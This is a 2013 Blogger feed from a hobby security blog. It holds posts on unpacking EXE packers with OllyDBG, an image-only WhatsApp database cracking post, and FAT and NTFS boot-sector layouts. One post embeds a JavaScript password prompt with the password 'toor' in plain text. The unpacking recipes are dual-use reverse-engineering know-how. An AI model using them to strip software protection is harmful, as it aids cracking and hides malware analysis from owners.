tag:blogger.com,1999:blog-69341135202378221842024-03-13T10:19:54.267-07:00 PoiNtEr->
Difference between a dream and an aim.
A dream requires soundless sleep,
whereas an aim requires sleepless efforts.Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.comBlogger216125tag:blogger.com,1999:blog-6934113520237822184.post-70400105271415676792013-04-02T12:23:00.001-07:002013-04-02T12:23:26.198-07:00Metasploit Auxiliary Module List<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://docs.google.com/file/d/0B3t7-cmGCHS9SGhqMHlIeVpHdTQ/edit?usp=sharing" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFyBNPV8ft5yEDyUK8cV-DD3-Vhdz3dP7U34u6zon92VvxccA_grg0IV2zHQSm-fttJKqHdJ4DcEi-yvfSnTuRrHUdz5yvMV0kA-bdqH3nQj09HDKlB_SMmWZ-8RiDQgZ4ZzGJDh6YvsPs/s1600/top-10-list.jpg" height="640" width="492" /></a></div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-48982245573577901452013-03-08T03:31:00.001-08:002013-03-08T03:31:22.776-08:00How to Unpack Various EXE Packers using OllyDBG<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div id="post_message_3335" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;">
<div style="text-align: center;">
<b>How to Unpack Various EXE Packers using OllyDBG</b></div>
<br />------------------------------------------------------------------------<br />ASPack 2.12:<br /><br />Load the exe, you will have to Shift+F9 several times. Upwards of 50<br />times is normal. Use Ctrl+G ESP BP technique. You'll land on a JNZ.<br />Trace into jump, it is pushing the oep. Trace into the ret. This<br />is the OEP. Dump then fix IAT. Fix dump. done.<br /><br />------------------------------------------------------------------------<br />EZIP 1.0:<br /><br />You start out on a JMP, trace into it. Ctrl+F9 (exec til ret). Scroll<br />down and you should find a large loop. Past that, there is a JMP EAX.<br />Trace into this JMP, this is the OEP. Dump, fix IAT, fix dump.<br /><br />------------------------------------------------------------------------<br />Neolite 2.0:<br /><br />Scroll down until you see JMP EAX. Put BP here. Step into<br />JMP. You're at the OEP. Dump and rebuild just as you would<br />with UPX.<br /><br />------------------------------------------------------------------------<br />PE-PaCK 1.0:<br /><br />You start on a JE with JMP right below it. Trace into the JMP. Now<br />you're on a PUSHAD. Use the Dump window Ctrl+G esp bp. You stop on<br />a JMP EAX. Trace into the JMP and you're at the OEP. Dump, rebuild<br />IAT, fix dump. Done.<br /><br />------------------------------------------------------------------------<br />Petite 2.2:<br /><br />Trace until you go over the PUSHAD. Click in dump window. Ctrl+G.<br />Type ESP. Select first two bytes in dump, set breakpoint on memory<br />access -> word. Back in CPU window, hit F9. Shift+F9 until you<br />reach POPAD/POPFW. There should be a JMP soon after the POP. Trace<br />into the JMP, this is the OEP. Dump process with LordPE. Open process<br />with imprec. Set correct OEP/IAT autotrace. Hit show invalid. Right<br />click and do a level 1. Fix the dump.<br /><br /><br />------------------------------------------------------------------------<br />UPX:<br /><br />Scroll down until you reach something that looks like this:<br /><br />004142C7 > 61 POPAD<br />004142C8 .-E9 BE6CFFFF JMP wrap.0040AF8B<br />004142CD 00 DB 00<br />004142CE 00 DB 00<br /><br />Set a breakpoint on the JMP and run. Step into the JMP.<br />You're at the OEP. Dump with LordPE. Open process<br />with impRec. Set OEP with the one you just found.<br />Hit IAT AutoSearch. Hit Get Imports. Delete the bad<br />thunks. Fix the dump. Done.<br /><br />------------------------------------------------------------------------<br /><br />OEP Finding Techniques<br /><br />#1 is just scroll down till u see<br />0040E23F .-E9 A479FFFF JMP upxs306.00405BE8<br />0040E244 5CE24000 DD upxs306.0040E25C<br />0040E248 60E24000 DD upxs306.0040E260<br />0040E24C C8734000 DD upxs306.004073C8<br /><br />JMP and some shit with a bunch of 0's.<br /><br />#2<br />F7 on the PUSHAD<br />goto the dump<br />CTRL + G<br />goto ESP<br />Set a hardware Breakpoint on WORD<br />that will take u straight to the jump<br /><br />#3<br />F7 onto the PUSHAD<br />ctrl + T<br />COMMAND is one of the following "POPAD"<br />then CTRL + F11</div>
<div>
<br /></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-15284041232209752292013-02-25T01:00:00.001-08:002013-02-25T01:00:46.738-08:00Cryptography ebook<div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://www.4shared.com/office/h6em5n-R/Introduction_to_Modern_Cryptog.html" style="margin-left: auto; margin-right: auto;" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7F1tpRY6VxwM1jN49zFojgPd9JOPZY1DdFWEz44c5EhwlKEaKT91NqwgVVGdrvbBqNWY7UL_UP4aKp8yX9rgWRsOuGQs2groM7QLQHyYcJxvKUjtpWIUBxaQBziNRTaks8rYNMjeIlDV7/s1600/1Backdoor.Bot.jpg" height="265" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://www.4shared.com/office/h6em5n-R/Introduction_to_Modern_Cryptog.html" target="_blank">Click Here</a></td></tr>
</tbody></table>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com1tag:blogger.com,1999:blog-6934113520237822184.post-75577509976694309422013-02-24T21:00:00.002-08:002013-02-24T21:00:33.535-08:00Crack Watsapp Database file encrypted with AES-128<div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM87vk0Ul8RJvl9ojM5hbS9SO7l9b6jdxxV1wQ-C7JagyIHV2XYuqJgnzZp19owcswHoJxvLBdS7p6MDauAnP-YeNtu7aPy1SpxY7Rzf8jLEo7FIaOZ6sTOQvYZYVSRLEXPVf4CszOz976/s1600/watsapp1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM87vk0Ul8RJvl9ojM5hbS9SO7l9b6jdxxV1wQ-C7JagyIHV2XYuqJgnzZp19owcswHoJxvLBdS7p6MDauAnP-YeNtu7aPy1SpxY7Rzf8jLEo7FIaOZ6sTOQvYZYVSRLEXPVf4CszOz976/s1600/watsapp1.png" height="330" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Crack db.crypt files of Watsapp</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKFDT9ohDwNhcBuisatKRHNYOibYK_KivLADJnqULzUe8qedEcksfbU6nZNDRJCvvlTlNy6Rz5ZmqnBlCjzzmRV6eQJ19xyhWtGJ2fQWy5lBpuRy3AA5OnwDWtF11ounkBdpVeVgFxTho/s1600/watsapp.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKFDT9ohDwNhcBuisatKRHNYOibYK_KivLADJnqULzUe8qedEcksfbU6nZNDRJCvvlTlNy6Rz5ZmqnBlCjzzmRV6eQJ19xyhWtGJ2fQWy5lBpuRy3AA5OnwDWtF11ounkBdpVeVgFxTho/s1600/watsapp.png" height="290" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Watsapp database</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9HIqNp2iOlsdAv_0jPXtURhgzxGyVsAwj7KofUMYvHAPEwPugHb6tD_nxuJlSI6MmBZHJSxSS2jcdHBCj1_sjFp0IKMMxS5K7xcd9IHPS29p-yj4xVT0JVhLv9fB7LCAEIbN9sy2lkVMy/s1600/watsapp2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9HIqNp2iOlsdAv_0jPXtURhgzxGyVsAwj7KofUMYvHAPEwPugHb6tD_nxuJlSI6MmBZHJSxSS2jcdHBCj1_sjFp0IKMMxS5K7xcd9IHPS29p-yj4xVT0JVhLv9fB7LCAEIbN9sy2lkVMy/s1600/watsapp2.png" height="242" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Messages</td></tr>
</tbody></table>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-43267011320199387162013-02-24T06:30:00.000-08:002013-02-24T06:30:21.780-08:00what "> /dev/null 2>&1" mean??<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<b>> /dev/null 2>&1</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ueBRc3h_8n6-llLi_U6ZtdCpKdOvPe0wwqbbeItFzHR7s_wlQpRrbd3jVBc3KxYTkKvQJYK41Jv8MHcwtPBP5-qr-R65sBIq0FebKa1NCvfJVvSaqxc3QHyBfCp-fSN1CxSbVL4Q9UjI/s1600/bash.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ueBRc3h_8n6-llLi_U6ZtdCpKdOvPe0wwqbbeItFzHR7s_wlQpRrbd3jVBc3KxYTkKvQJYK41Jv8MHcwtPBP5-qr-R65sBIq0FebKa1NCvfJVvSaqxc3QHyBfCp-fSN1CxSbVL4Q9UjI/s1600/bash.jpg" height="240" width="320" /></a></div>
<br />
You need to understand the theory first and then its upto you how and where you want to apply that theory. I'll try to explain above to you.<br />
<br />
The greater-than (>) in commands like these redirect the program’s output somewhere. In this case, something is being redirected into /dev/null, and something is being redirected into &1.<br />
<br />
Standard in, out and error:<br />
<br />
There are three standard sources of input and output for a program. Standard input usually comes from the keyboard if it’s an interactive program, or from another program if it’s processing the other program’s output. The program usually prints to standard output, and sometimes prints to standard error. These three file descriptors (you can think of them as “data pipes”) are often called STDIN, STDOUT, and STDERR.<br />
<br />
Sometimes they’re not named, they’re numbered! The built-in numberings for them are 0, 1, and 2, in that order. By default, if you don’t name or number one explicitly, you’re talking about STDOUT.<br />
<br />
That means file descriptor 0 or fd0 denotes STDIN or standard input and file descriptor 1 or fd1 denotes STDOUT or standard output and file descriptor 2 or fd2 denotes STDERR or standard error.<br />
<br />
You can see the command above is redirecting standard output into /dev/null, which is a place you can dump anything you don’t want (often called the bit-bucket), then redirecting standard error into standard output (you have to put an & in front of the destination when you do this).<br />
<br />
The short explanation, therefore, is “all output from this command should be shoved into a black hole.” That’s one good way to make a program be really quiet!<br />
<br />
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-2860002373198047642013-02-22T08:40:00.002-08:002013-02-22T08:40:22.924-08:00Nidhi Verma's Blog: Buffer<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQV9mVLHyCd9FbjdbkEuR0LlPvYBqbkdUFu8duWzpQqJ8OOIK3UugwpLCrDlFuKn70UvvcUQt7p6zO-_Zbn8JIcWYp81b2hcioftF2Hp8sebsPyIJxnh8h_BBCmfOVJEwtQhXh1jc3OubE/s1600/29012_560602520652009_1155748196_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQV9mVLHyCd9FbjdbkEuR0LlPvYBqbkdUFu8duWzpQqJ8OOIK3UugwpLCrDlFuKn70UvvcUQt7p6zO-_Zbn8JIcWYp81b2hcioftF2Hp8sebsPyIJxnh8h_BBCmfOVJEwtQhXh1jc3OubE/s1600/29012_560602520652009_1155748196_n.jpg" height="300" width="400" /></a></div>
<div style="text-align: center;">
<span style="font-size: large;"><b style="background-color: #0b5394;">http://nidhi--verma.blogspot.com</b></span></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-85508927391183053412013-02-07T09:46:00.001-08:002013-02-07T09:46:24.078-08:00What happens when you format a disk?<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMiFZzLuQHxrnUnhUgVclvd0FgG_PQ80EhtUkXU_4c78sdbOzVvpQoCWlBCq8s27TcFA0LijF4q7MJ6BXltl_iALTjWkPlL7HaiaajRMMVrIoM23H2TChgSqwipW6LshVh6dIyUDAXR6q/s1600/NEC_D5662_Hard_disk.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMiFZzLuQHxrnUnhUgVclvd0FgG_PQ80EhtUkXU_4c78sdbOzVvpQoCWlBCq8s27TcFA0LijF4q7MJ6BXltl_iALTjWkPlL7HaiaajRMMVrIoM23H2TChgSqwipW6LshVh6dIyUDAXR6q/s1600/NEC_D5662_Hard_disk.jpg" height="300" width="400" /></a></div>
<div class="profile vcard" id="profile-AA11991317">
<span style="font-family: Trebuchet MS, sans-serif;"> </span></div>
<div class="profile vcard" id="profile-AA11991317">
<span style="font-family: Trebuchet MS, sans-serif;">A new disk is like a blank sheet of paper. When it is formatted, it becomes organized into numbered blocks with an index to what is in each square, and which blocks are free to write to.</span></div>
<div class="qa-container" id="yui_3_3_0_1_1360257731480159">
<div class="content" id="yui_3_3_0_1_1360257731480158">
<span style="font-family: Trebuchet MS, sans-serif;">Each format type organizes the disk into a certain number of blocks of a certain size so that it can quickly read from and write to each block.<br />The index and the numbering system use space on the disk. So even though the empty size is 100% the formatted size is 90% or something.<br />When you format an old disk, you have two ways. Just erase the index, and the system thinks it can write to every block. This is a 'quick format' and leaves all the old information on the disk. A 'deep format' erases everything and starts over with no information on the disk. A <span class="yshortcuts cs4-visible" id="lw_1360257722_0">disk recovery</span> application can easily find information on a quick formatted disk.</span></div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-59671243960778547112013-01-29T13:20:00.001-08:002013-01-29T13:20:24.820-08:00FAT FILESYSTEM<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<h2 style="text-align: center;">
<a href="" name="s1"><span style="font-size: large;">FAT</span></a></h2>
The traditional DOS filesystem types are FAT12 and FAT16. Here FAT stands for File Allocation Table: the disk is divided into <i>clusters</i>, the unit used by the file allocation, and the FAT describes which clusters are used by which files.<br />
<br />
<span style="font-family: inherit;"><b>Layout</b></span><br />
<span style="font-family: inherit;">First the boot sector (at relative address 0), and possibly other stuff. Together these are the Reserved Sectors. Usually the boot sector is the only reserved sector.</span><br />
<span style="font-family: inherit;">Then the FATs (following the reserved sectors; the number of reserved sectors is given in the boot sector, bytes 14-15; the length of a sector is found in the boot sector, bytes 11-12).</span><br />
<span style="font-family: inherit;">Then the Root Directory (following the FATs; the number of FATs is given in the boot sector, byte 16; each FAT has a number of sectors given in the boot sector, bytes 22-23).</span><br />
<span style="font-family: inherit;">Finally the Data Area (following the root directory; the number of root directory entries is given in the boot sector, bytes 17-18, and each directory entry takes 32 bytes; space is rounded up to entire sectors).</span><br />
<br />
<h2>
<a href="" name="ss1.2"><span style="font-family: inherit; font-size: small;">Boot sector</span></a></h2>
<span style="font-family: inherit;">The first sector (512 bytes) of a FAT filesystem is the <i>boot sector</i>. In Unix-like terminology this would be called the superblock. It contains some general information.</span><br />
<span style="font-family: inherit;">First an explicit example (of the boot sector of a DRDOS boot floppy).</span><br />
<pre><span style="font-family: inherit;">0000000 eb 3f 90 49 42 4d 20 20 33 2e 33 00 02 01 01 00
0000020 02 e0 00 40 0b f0 09 00 12 00 02 00 00 00 00 00
0000040 00 00 00 00 00 00 00 00 00 00 70 00 ff ff 49 42
0000060 4d 42 49 4f 20 20 43 4f 4d 00 50 00 00 08 00 18
...
</span></pre>
<span style="font-family: inherit;">(See <a href="http://www.win.tue.nl/~aeb/linux/fs/fat/bootsector.drdos">here</a> for the complete sector. And also a <a href="http://www.win.tue.nl/~aeb/linux/fs/fat/bootsector.msdos">MSDOS example</a>)</span><span style="font-family: inherit;">The 2-byte numbers are stored little endian (low order byte first).</span><br />
<span style="font-family: inherit;">Here the FAT12 version, that is also the common part of the FAT12, FAT16 and FAT32 boot sectors. See further below.</span><br />
<pre><span style="font-family: inherit;">Bytes Content
0-2 Jump to bootstrap (E.g. eb 3c 90; on i86: JMP 003E NOP.
One finds either eb xx 90, or e9 xx xx.
The position of the bootstrap varies.)
3-10 OEM name/version (E.g. "IBM 3.3", "IBM 20.0", "MSDOS5.0", "MSWIN4.0".
Various format utilities leave their own name, like "CH-FOR18".
Sometimes just garbage. Microsoft recommends "MSWIN4.1".)
/* BIOS Parameter Block starts here */
11-12 Number of bytes per sector (512)
Must be one of 512, 1024, 2048, 4096.
13 Number of sectors per cluster (1)
Must be one of 1, 2, 4, 8, 16, 32, 64, 128.
A cluster should have at most 32768 bytes. In rare cases 65536 is OK.
14-15 Number of reserved sectors (1)
FAT12 and FAT16 use 1. FAT32 uses 32.
16 Number of FAT copies (2)
17-18 Number of root directory entries (224)
0 for FAT32. 512 is recommended for FAT16.
19-20 Total number of sectors in the filesystem (2880)
(in case the partition is not FAT32 and smaller than 32 MB)
21 Media descriptor type (f0: 1.4 MB floppy, f8: hard disk; see below)
22-23 Number of sectors per FAT (9)
0 for FAT32.
24-25 Number of sectors per track (12)
26-27 Number of heads (2, for a double-sided diskette)
28-29 Number of hidden sectors (0)
Hidden sectors are sectors preceding the partition.
/* BIOS Parameter Block ends here */
30-509 Bootstrap
510-511 Signature 55 aa
</span></pre>
<span style="font-family: inherit;">The signature is found at offset 510-511. This will be the end of the sector only in case the sector size is 512.</span><br />
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-82158620668977896672013-01-27T20:35:00.000-08:002013-01-27T20:41:13.852-08:00Crack Password !!<div dir="ltr" style="text-align: left;" trbidi="on">
<script language="JavaScript">
<!--hide
var password;
var pass1="toor";
password=prompt('Please enter your password to view this page!',' ');
if (password==pass1)
alert('Password Correct! Click OK to enter!');
else
{
window.location="http://vishal--mishra.blogspot.in/2013/01/siocsifaddr-no-such-device-error-while.html";
}
//</script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzd6d6ja3uQZyr4L3do-i_XdRMDnp1BSRwIJ6WJvrixE6gnnI3ZTdcvG0xEv-a4Kufl-Y2bjswGJVX9mzRX6YeNi3L79eA97YER1eFuaAckF28WIMOuW5a_IpVOBfhRojvoCqT_QweQHXl/s1600/password-cracking.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzd6d6ja3uQZyr4L3do-i_XdRMDnp1BSRwIJ6WJvrixE6gnnI3ZTdcvG0xEv-a4Kufl-Y2bjswGJVX9mzRX6YeNi3L79eA97YER1eFuaAckF28WIMOuW5a_IpVOBfhRojvoCqT_QweQHXl/s320/password-cracking.jpg" height="480" width="640" /></a></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-53654576731845012762013-01-19T21:13:00.000-08:002013-01-19T21:13:07.679-08:00SIOCSIFADDR: No such device ( ERROR while getting interface flags)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<b><span style="font-size: large;">SIOCSIFADDR: No such device eth0: ERROR while getting interface flags: No such device</span></b></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCHi73wMGagPclxqiTibt7xwAj5DTBz0L6vxm9cZqFM3n-pvyHKGbp3RX4EhGYEx0LlJSh5YIHN-J2gd7IS4_LPvf43PFvm_HmlDUFArdOrul1oPO6huR63eiDeHL7HJF_7sMpv4DaesFz/s1600/device.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCHi73wMGagPclxqiTibt7xwAj5DTBz0L6vxm9cZqFM3n-pvyHKGbp3RX4EhGYEx0LlJSh5YIHN-J2gd7IS4_LPvf43PFvm_HmlDUFArdOrul1oPO6huR63eiDeHL7HJF_7sMpv4DaesFz/s400/device.png" width="400" /></a></div>
<div style="text-align: center;">
<b><span style="font-size: large;"><br /></span></b></div>
Each time you give a new MAC address (in Vmware guest settings) Debian and Ubuntu guests udev assigns a new eth number.To remove this error<br />
<b>1:</b>edit /etc/udev/rules.d/70-persistent-net.rules or<br />
<b>2:</b> delete the file(it will be recreated at every boot.)<br />
So i would suggest you to go for option 2 and before doing so make a backup of 70-persistent-net.rules file.<br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-87586444229871375272013-01-14T17:57:00.000-08:002013-01-14T17:57:24.805-08:00NTFS Partition<div dir="ltr" style="text-align: left;" trbidi="on">
When you format an NTFS volume, the format program allocates the first 16 sectors for the $Boot metadata file. First sector, in fact, is a boot sector with a "bootstrap" code and the following 15 sectors are the boot sector's IPL (initial program loader). To increase file system reliability the very last sector an NTFS partition contains a spare copy of the boot sector.<br />
On NTFS volumes, the data fields that follow the BPB form an extended BPB. The data in these fields enables Ntldr (NT loader program) to find the master file table (MFT) during startup. On NTFS volumes, the MFT is not located in a predefined sector, as on FAT16 and FAT32 volumes. For this reason, the MFT can be moved if there is a bad sector in its normal location. However, if the data is corrupted, the MFT cannot be located, and Windows NT/2000 assumes that the volume has not been formatted. The following example illustrates the boot sector of an NTFS volume formatted while running Windows 2000. The printout is formatted in three sections: Bytes 0x00- 0x0A are the jump instruction and the OEM ID . Bytes 0x0B-0x53 are the BPB and the extended BPB. The remaining code is the bootstrap code and the end of sector marker .<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUFDbx87H12cMsGNBtIwc04hweony6v4UrryHp5uMtnDd-_puN2Sd3E_Fc3VjgT_KclILo93rHXkBD2zRTULqfyn6Sbyjj9K_mutTmLQUrbQau22yuj2SECXNOvYN_l0qWArrWiiOpkwB_/s1600/ntfs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUFDbx87H12cMsGNBtIwc04hweony6v4UrryHp5uMtnDd-_puN2Sd3E_Fc3VjgT_KclILo93rHXkBD2zRTULqfyn6Sbyjj9K_mutTmLQUrbQau22yuj2SECXNOvYN_l0qWArrWiiOpkwB_/s320/ntfs.jpg" width="320" /></a></div>
<br />
Each file on an NTFS volume is represented by a record in a special file called the master file table (MFT). NTFS reserves the first 16 records of the table for special information. The first record of this table describes the master file table itself, followed by a MFT mirror record. If the first MFT record is corrupted, NTFS reads the second record to find the MFT mirror file, whose first record is identical to the first record of the MFT. The locations of the data segments for both the MFT and MFT mirror file are recorded in the boot sector.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmNonP4531gr7qMyNdniQp2Mfg1e4zh3jqN984CFjirgGaxc9SuOMYFvV-lQ_ndkqiYDTZJBEGDhz9t7dSUxs8s9kyGj-fpSPcinbDPF2NmrBxRkH-wynRKIwtcI7NZt65mNpYJfT1sHL/s1600/ntfs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmNonP4531gr7qMyNdniQp2Mfg1e4zh3jqN984CFjirgGaxc9SuOMYFvV-lQ_ndkqiYDTZJBEGDhz9t7dSUxs8s9kyGj-fpSPcinbDPF2NmrBxRkH-wynRKIwtcI7NZt65mNpYJfT1sHL/s1600/ntfs.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<table cellpadding="0" cellspacing="0" class="ntfs-features-more" style="background-color: white; box-shadow: rgb(255, 255, 255) 1px 0px 0px; color: black; font-family: 'Trebuchet MS', Arial, Helvetica, sans-serif; font-size: 16px; margin-bottom: 0px; margin-top: 50px; padding: 0px; width: 99%px;"><tbody>
<tr><th align="center" style="padding: 0px 0px 10px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Byte Offset</div>
</th><th align="center" style="padding: 0px 0px 10px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Field Length</div>
</th><th align="center" style="padding: 0px 0px 10px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Field Name</div>
</th></tr>
<tr><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;">0x00</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
3 bytes</div>
</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Jump Instruction</div>
</td></tr>
<tr><td align="center" style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;">0x03</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
LONGLONG</div>
</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
OEM ID</div>
</td></tr>
<tr><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;">0x0B</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
25 bytes</div>
</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
BPB</div>
</td></tr>
<tr><td align="center" style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;">0x24</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
48 bytes</div>
</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Extended BPB</div>
</td></tr>
